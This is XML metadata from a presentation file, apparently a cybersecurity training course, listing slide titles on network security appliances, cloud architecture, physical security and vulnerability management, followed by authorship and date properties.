      <vt:lpstr>Routing Infrastructure Considerations</vt:lpstr>
      <vt:lpstr>Virtual LANs</vt:lpstr>
      <vt:lpstr>Security Zones</vt:lpstr>
      <vt:lpstr>Attack Surface</vt:lpstr>
      <vt:lpstr>Port Security</vt:lpstr>
      <vt:lpstr>Physical Isolation</vt:lpstr>
      <vt:lpstr>Architecture Considerations</vt:lpstr>
      <vt:lpstr>Review Activity: Enterprise Network Architecture</vt:lpstr>
      <vt:lpstr>Topic 5B - Network Security Appliances</vt:lpstr>
      <vt:lpstr>Device Attributes</vt:lpstr>
      <vt:lpstr>Fail-Open versus Fail-Closed</vt:lpstr>
      <vt:lpstr>Firewalls</vt:lpstr>
      <vt:lpstr>Layer 4 and Layer 7 Firewalls</vt:lpstr>
      <vt:lpstr>Layer 4 Firewall</vt:lpstr>
      <vt:lpstr>Layer 7 Firewall</vt:lpstr>
      <vt:lpstr>Proxy Servers</vt:lpstr>
      <vt:lpstr>Intrusion Detection Systems</vt:lpstr>
      <vt:lpstr>Next-Generation Firewalls and Unified Threat Management</vt:lpstr>
      <vt:lpstr>Load Balancers</vt:lpstr>
      <vt:lpstr>Scheduling</vt:lpstr>
      <vt:lpstr>Web Application Firewalls</vt:lpstr>
      <vt:lpstr>Review Activity: Network Security Appliances</vt:lpstr>
      <vt:lpstr>Topic 5C - Secure Communications</vt:lpstr>
      <vt:lpstr>Transport Layer Security Tunneling</vt:lpstr>
      <vt:lpstr>Internet Protocol Security Tunneling</vt:lpstr>
      <vt:lpstr>Internet Key Exchange</vt:lpstr>
      <vt:lpstr>Remote Desktop</vt:lpstr>
      <vt:lpstr>Secure Shell</vt:lpstr>
      <vt:lpstr>SSH Commands</vt:lpstr>
      <vt:lpstr>Out-of-Band Management and Jump Servers</vt:lpstr>
      <vt:lpstr>Review Activity: Secure Communications</vt:lpstr>
      <vt:lpstr>Lesson 5 Summary</vt:lpstr>
      <vt:lpstr>Lesson 6 Secure Cloud Network Architecture</vt:lpstr>
      <vt:lpstr>Topic 6A - Cloud Infrastructure</vt:lpstr>
      <vt:lpstr>Cloud Deployment Models</vt:lpstr>
      <vt:lpstr>Security Considerations</vt:lpstr>
      <vt:lpstr>Hybrid Cloud</vt:lpstr>
      <vt:lpstr>Cloud Service Models</vt:lpstr>
      <vt:lpstr>Responsibility Matrix</vt:lpstr>
      <vt:lpstr>Centralized and Decentralized Computing</vt:lpstr>
      <vt:lpstr>Resilient Architecture Concepts</vt:lpstr>
      <vt:lpstr>Application Virtualization and Container Virtualization</vt:lpstr>
      <vt:lpstr>Cloud Architecture</vt:lpstr>
      <vt:lpstr>Cloud Automation Technologies</vt:lpstr>
      <vt:lpstr>Software Defined Networking</vt:lpstr>
      <vt:lpstr>Cloud Architecture Features</vt:lpstr>
      <vt:lpstr>Cloud Security Considerations</vt:lpstr>
      <vt:lpstr>Review Activity: Cloud Infrastructure</vt:lpstr>
      <vt:lpstr>Topic 6B - Embedded Systems and Zero Trust Architecture</vt:lpstr>
      <vt:lpstr>Real-Time Operating Systems</vt:lpstr>
      <vt:lpstr>Industrial Control Systems</vt:lpstr>
      <vt:lpstr>Internet of Things</vt:lpstr>
      <vt:lpstr>Deperimeterization and Zero Trust</vt:lpstr>
      <vt:lpstr>Zero Trust Security Concepts</vt:lpstr>
      <vt:lpstr>Zero Trust Architecture Examples</vt:lpstr>
      <vt:lpstr>Review Activity: Embedded System and Zero Trust Architecture</vt:lpstr>
      <vt:lpstr>Lesson 6 Summary</vt:lpstr>
      <vt:lpstr>Lesson 7 - Explain Resiliency and Site Security Concepts</vt:lpstr>
      <vt:lpstr>Topic 7A - Asset Management</vt:lpstr>
      <vt:lpstr>Asset Protection Concepts</vt:lpstr>
      <vt:lpstr>Data Backups</vt:lpstr>
      <vt:lpstr>Advanced Data Protection</vt:lpstr>
      <vt:lpstr>Secure Data Destruction</vt:lpstr>
      <vt:lpstr>Review Activity: Asset Management</vt:lpstr>
      <vt:lpstr>Topic 7B - Redundancy Strategies</vt:lpstr>
      <vt:lpstr>Capacity Planning Risks</vt:lpstr>
      <vt:lpstr>High Availability</vt:lpstr>
      <vt:lpstr>Clustering</vt:lpstr>
      <vt:lpstr>Power Redundancy</vt:lpstr>
      <vt:lpstr>Diversity and Defense in Depth</vt:lpstr>
      <vt:lpstr>Deception Technologies</vt:lpstr>
      <vt:lpstr>Testing Resiliency</vt:lpstr>
      <vt:lpstr>Review Activity: Redundancy Strategies</vt:lpstr>
      <vt:lpstr>Topic 7C - Physical Security</vt:lpstr>
      <vt:lpstr>Site Layout, Fencing, and Lighting</vt:lpstr>
      <vt:lpstr>Gateways and Locks</vt:lpstr>
      <vt:lpstr>Security Guards and Cameras</vt:lpstr>
      <vt:lpstr>Review Activity: Physical Security</vt:lpstr>
      <vt:lpstr>Lesson 7 - Summary</vt:lpstr>
      <vt:lpstr>Lesson 8 - Explain Vulnerability Management</vt:lpstr>
      <vt:lpstr>Topic 8A - Device and OS Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerability Types</vt:lpstr>
      <vt:lpstr>Sideloading, Rooting, and Jailbreaking</vt:lpstr>
      <vt:lpstr>Review Activity: Device and OS Vulnerabilities</vt:lpstr>
      <vt:lpstr>Topic 8B - Application and Cloud Vulnerabilities</vt:lpstr>
      <vt:lpstr>Evaluation Scope</vt:lpstr>
      <vt:lpstr>Web Application Attacks</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>Cloud-Based Application Attacks</vt:lpstr>
      <vt:lpstr>Supply Chain</vt:lpstr>
      <vt:lpstr>Review Activity: Application and Cloud Vulnerabilities</vt:lpstr>
      <vt:lpstr>Topic 8C - Vulnerability Identification Methods</vt:lpstr>
      <vt:lpstr>Credentialed and Non-Credentialed Scans</vt:lpstr>
      <vt:lpstr>Application and Web Application Scanners</vt:lpstr>
      <vt:lpstr>Deep and Dark Web</vt:lpstr>
      <vt:lpstr>Other Vulnerability Assessment Methods</vt:lpstr>
      <vt:lpstr>Review Activity: Vulnerability Identification Methods</vt:lpstr>
      <vt:lpstr>Topic 8D - Vulnerability Analysis and Remediation</vt:lpstr>
      <vt:lpstr>False Positives, False Negatives, and Log Review</vt:lpstr>
      <vt:lpstr>Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Review Activity: Vulnerability Analysis and Remediation</vt:lpstr>
      <vt:lpstr>Lesson 8 - Summary</vt:lpstr>
      <vt:lpstr>Lesson 9 - Evaluate Network Security Capabilities</vt:lpstr>
      <vt:lpstr>Topic 9A - Network Security Baselines</vt:lpstr>
      <vt:lpstr>Wireless Network Installation Considerations</vt:lpstr>
      <vt:lpstr>Wireless Encryption</vt:lpstr>
      <vt:lpstr>Wi-Fi Authentication Methods</vt:lpstr>
      <vt:lpstr>Network Access Control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efriz4ever@gmail.com</dc:creator>
  <cp:lastModifiedBy>efriz4ever@gmail.com</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-05T12:44:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-10T19:13:34Z</dcterms:modified>
</cp:coreProperties>
</file>